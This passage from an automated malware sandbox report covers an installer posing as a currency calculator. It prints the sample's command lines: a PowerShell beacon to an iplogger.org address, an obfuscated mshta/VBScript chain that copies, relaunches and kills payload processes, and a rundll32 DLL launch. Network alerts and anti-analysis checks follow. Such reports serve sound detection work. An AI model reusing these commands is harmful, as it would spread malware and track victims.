Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 19, 2021, 10:42 a.m.	Sept. 19, 2021, 10:57 a.m.

Size	5.1MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5	`63fe4796434aad20a0ccbb0944ea0f02`
SHA256	`13d8d9a03df3f510c71149a3c9ccaa4570172e45b34463d16e85a008a57469bf`
CRC32	`E9BC2548`
ssdeep	`98304:yuClpTFTdkyIgBi3+XbH5NnvJVkzO/6hpmCeqOu7sIf7UxdMVbIa9PBYXUm2Qs5:GFqNgBiuXbH5rihICx7BIxdMJIa9iUm4`
Yara	PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library IsPE32 - (no description)

CurrenyCalculatorInst.exe "C:\Users\test22\AppData\Local\Temp\CurrenyCalculatorInst.exe"
2472
- cmd.exe "cmd" /c start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
  1660
  - wwi.exe "wwi.exe"
    1772
    - vss.exe "C:\Users\test22\AppData\Local\Temp\vss.exe"
      1148
      - mshta.exe "C:\Windows\System32\mshta.exe" VbscripT: clOSE( cReATEoBjEct ( "WSCriPt.ShELL"). run ( "CmD.EXE /c CopY /y ""C:\Users\test22\AppData\Local\Temp\vss.exe"" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA& if """"== """" for %j In (""C:\Users\test22\AppData\Local\Temp\vss.exe"" ) do taskkill /F -Im ""%~Nxj"" ", 0 ,TRUE ))
        1384
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c CopY /y "C:\Users\test22\AppData\Local\Temp\vss.exe" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if ""=="" for %j In ("C:\Users\test22\AppData\Local\Temp\vss.exe" ) do taskkill /F -Im "%~Nxj"
        236
        
        W7sP3hTJPToEEt.exE W7sP3HTJPToeET.exe /PCOd0LPl_yA
        2532
        
        mshta.exe "C:\Windows\System32\mshta.exe" VbscripT: clOSE( cReATEoBjEct ( "WSCriPt.ShELL"). run ( "CmD.EXE /c CopY /y ""C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE"" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA& if ""/PCOd0LPl_yA""== """" for %j In (""C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE"" ) do taskkill /F -Im ""%~Nxj"" ", 0 ,TRUE ))
        2040
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c CopY /y "C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if "/PCOd0LPl_yA"=="" for %j In ("C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" ) do taskkill /F -Im "%~Nxj"
        2088
        
        rundll32.exe "C:\Windows\System32\rundll32.exe" GBmH.yE,MSoGFUg
        1312
        
        taskkill.exe taskkill /F -Im "vss.exe"
        1776
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
      1580
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1580 CREDAT:145409
        876
  - wwl.exe "wwl.exe"
    1376
  - powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
    508

Name	Response	Post-Analysis Lookup
iplogger.org	A 88.99.66.31	88.99.66.31
api.ip.sb	CNAME api.ip.sb.cdn.cloudflare.net A 104.26.13.31 A 104.26.12.31 A 172.67.75.172	104.26.12.31
123456789009876
installcb.online	A 31.31.196.204	31.31.196.204
demner.site	A 80.66.87.32	80.66.87.32
secure.globalsign.com	A 104.18.21.226 CNAME global.prd.cdn.globalsign.com CNAME cdn.globalsigncdn.com.cdn.cloudflare.net A 104.18.20.226	104.18.20.226

IP Address	Status	Action
104.18.20.226	Active	Moloch
104.26.12.31	Active	Moloch
117.18.232.200	Active	Moloch
164.124.101.2	Active	Moloch
31.31.196.204	Active	Moloch
79.174.13.108	Active	Moloch
80.66.87.32	Active	Moloch
88.99.66.31	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49177 -> 104.26.12.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49178 -> 104.26.12.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49196 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49197 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49187 -> 31.31.196.204:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49177 104.26.12.31:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	7d:9f:08:6e:96:fc:4c:1d:eb:94:53:45:8a:6c:7e:e7:c1:69:47:e9
TLSv1 192.168.56.102:49178 104.26.12.31:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	7d:9f:08:6e:96:fc:4c:1d:eb:94:53:45:8a:6c:7e:e7:c1:69:47:e9
TLSv1 192.168.56.102:49196 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLSv1 192.168.56.102:49197 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLS 1.2 192.168.56.102:49187 31.31.196.204:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign GCC R3 DV TLS CA 2020	CN=www.installcb.online	41:c7:cf:0d:d3:ab:c2:1a:1a:55:15:1d:dd:bc:c3:22:7f:b3:26:c8

Queries for the computername (30 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 19, 2021, 10:43 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 19, 2021, 10:42 a.m.			0	0
IsDebuggerPresent Sept. 19, 2021, 10:42 a.m.			0	0
IsDebuggerPresent Sept. 19, 2021, 10:42 a.m.			0	0
IsDebuggerPresent Sept. 19, 2021, 10:42 a.m.			0	0
IsDebuggerPresent Sept. 19, 2021, 10:42 a.m.			0	0
IsDebuggerPresent Sept. 19, 2021, 10:43 a.m.			0	0

Command line console output was observed (7 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 19, 2021, 10:43 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 19, 2021, 10:43 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 19, 2021, 10:43 a.m.	buffer: taskkill console_handle: 0x00000007	1	1
WriteConsoleW Sept. 19, 2021, 10:43 a.m.	buffer: /F -Im "vss.exe" console_handle: 0x00000007	1	1
WriteConsoleW Sept. 19, 2021, 10:43 a.m.	buffer: SUCCESS: The process "vss.exe" with PID 1148 has been terminated. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 19, 2021, 10:43 a.m.	buffer: The file cannot be copied onto itself. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 19, 2021, 10:43 a.m.	buffer: 0 file(s) copied. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 64 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00c74520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00c74520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00c745a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00d1e420 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00d1e420 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00d1e320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00d1e760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00d1e7e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00d1e7e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007439c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007439c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00743a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007f2260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007f2260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007f2160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007f2160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007f2260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007f2260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9930 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9930 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9930 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b96f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b9b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b99f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b99f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b99f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b99f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b99f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b99f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b99f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2021, 10:42 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b99f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 19, 2021, 10:42 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.ndata

One or more processes crashed (10 events)

Time & API	Arguments	Status
__exception__ Sept. 19, 2021, 10:42 a.m.	stacktrace: wwi+0x4b07b4 @ 0x7d07b4 wwi+0x4b0863 @ 0x7d0863 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc e9 09 8e fd 8a 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x7566b727 registers.esp: 12515192 registers.edi: 4513792 registers.eax: 12515192 registers.ebp: 12515272 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 2008380459 registers.ecx: 4010934272	1
__exception__ Sept. 19, 2021, 10:42 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 83 c4 04 e9 30 dc e6 ff exception.symbol: wwi+0x4b4f6d exception.instruction: in eax, dx exception.module: wwi.exe exception.exception_code: 0xc0000096 exception.offset: 4935533 exception.address: 0x7d4f6d registers.esp: 12515312 registers.edi: 6584187 registers.eax: 1750617430 registers.ebp: 4513792 registers.edx: 2130532438 registers.ebx: 0 registers.esi: 13 registers.ecx: 20	1
__exception__ Sept. 19, 2021, 10:42 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 83 c4 04 81 fb 68 58 4d exception.symbol: wwi+0x4b4fe1 exception.instruction: in eax, dx exception.module: wwi.exe exception.exception_code: 0xc0000096 exception.offset: 4935649 exception.address: 0x7d4fe1 registers.esp: 12515312 registers.edi: 6584187 registers.eax: 1447909480 registers.ebp: 4513792 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 13 registers.ecx: 10	1
__exception__ Sept. 19, 2021, 10:42 a.m.	stacktrace: 0xf38213 0xf3811d 0xf36ca7 0xf369e1 0xf351cb 0xf30076 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f32652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72f4264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72f42e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72ff74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72ff7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73081dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73081e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73081f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7308416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x735df5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73657f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73654de3 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 1b eb 13 83 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xf38322 registers.esp: 12512148 registers.edi: 55169488 registers.eax: 0 registers.ebp: 12512172 registers.edx: 12997456 registers.ebx: 55168772 registers.esi: 55169592 registers.ecx: 0	1
__exception__ Sept. 19, 2021, 10:42 a.m.	stacktrace: wwl+0x4c92a4 @ 0x14d92a4 wwl+0x4c9353 @ 0x14d9353 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc e9 1a d3 cd 8b 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x7566b727 registers.esp: 4192552 registers.edi: 18079744 registers.eax: 4192552 registers.ebp: 4192632 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 2008380459 registers.ecx: 288686080	1
__exception__ Sept. 19, 2021, 10:42 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 83 c4 04 e9 0a f1 e4 ff exception.symbol: wwl+0x4f194a exception.instruction: in eax, dx exception.module: wwl.exe exception.exception_code: 0xc0000096 exception.offset: 5183818 exception.address: 0x150194a registers.esp: 4192672 registers.edi: 20247119 registers.eax: 1750617430 registers.ebp: 18079744 registers.edx: 22614 registers.ebx: 0 registers.esi: 13 registers.ecx: 20	1
__exception__ Sept. 19, 2021, 10:42 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 83 c4 04 81 fb 68 58 4d exception.symbol: wwl+0x4f19be exception.instruction: in eax, dx exception.module: wwl.exe exception.exception_code: 0xc0000096 exception.offset: 5183934 exception.address: 0x15019be registers.esp: 4192672 registers.edi: 20247119 registers.eax: 1447909480 registers.ebp: 18079744 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 13 registers.ecx: 10	1
__exception__ Sept. 19, 2021, 10:42 a.m.	stacktrace: 0x5ebc7d 0x5ebbd9 0x5ebb6e 0x5e6ca7 0x5e69e1 0x5e50d7 0x5e0076 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72f32652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72f4264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72f42e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72ff74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72ff7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73081dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73081e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73081f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7308416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x735df5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73657f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73654de3 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 23 eb 1b 83 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5ebd22 registers.esp: 4189500 registers.edi: 54964700 registers.eax: 0 registers.ebp: 4189524 registers.edx: 7557968 registers.ebx: 54963984 registers.esi: 54964804 registers.ecx: 0	1
__exception__ Sept. 19, 2021, 10:44 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x76934387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x7532ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75326b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75345c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x753c06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x76a0d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x76a0d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x76a0ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x76928a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x76928938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7692950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x76a0dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x76a0db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x76a0e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x76929367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x76929326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755762fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75576d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 